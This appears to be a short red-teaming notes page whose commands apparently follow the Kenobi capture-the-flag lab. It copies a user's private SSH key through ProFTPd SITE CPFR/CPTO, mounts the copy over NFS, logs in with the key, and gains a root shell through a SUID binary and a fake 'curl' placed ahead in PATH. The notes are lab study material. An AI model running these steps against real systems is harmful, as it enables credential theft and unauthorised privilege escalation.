RSS Feed

Temp Notes for Red Teaming

Created: 28.07.2022




smbclient //
smbget -R smb://

nc ftp.server.com 21

# Pro FTPd
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

searchsploit <app_name> <app version>

mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

ssh -i id_rsa kenobi@

# Find SUID/SGID files
find / -perm -u=s -type f 2>/dev/null

strings /usr/bin/menu

echo /bin/sh > curl
chmod 777 curl 
export PATH=/tmp:$PATH^C


Say, for example, that some utility has this bit set. That means that the utility has elevated permissions. You might get lucky; check the executable with strings for some commands. If you see some system utility without a full path, you can create a script in the same location and it will be run instead.

# check which system utility to override
strings /usr/bin/menu

# create a script file with the same name as a system utility
echo /bin/sh > curl

# give it rwx permissions 
chmod 777 curl 

# add the directory to PATH env variable so that the system checks this location for curl when the program is run
export PATH=/tmp:$PATH

# run the program


Expand… Something here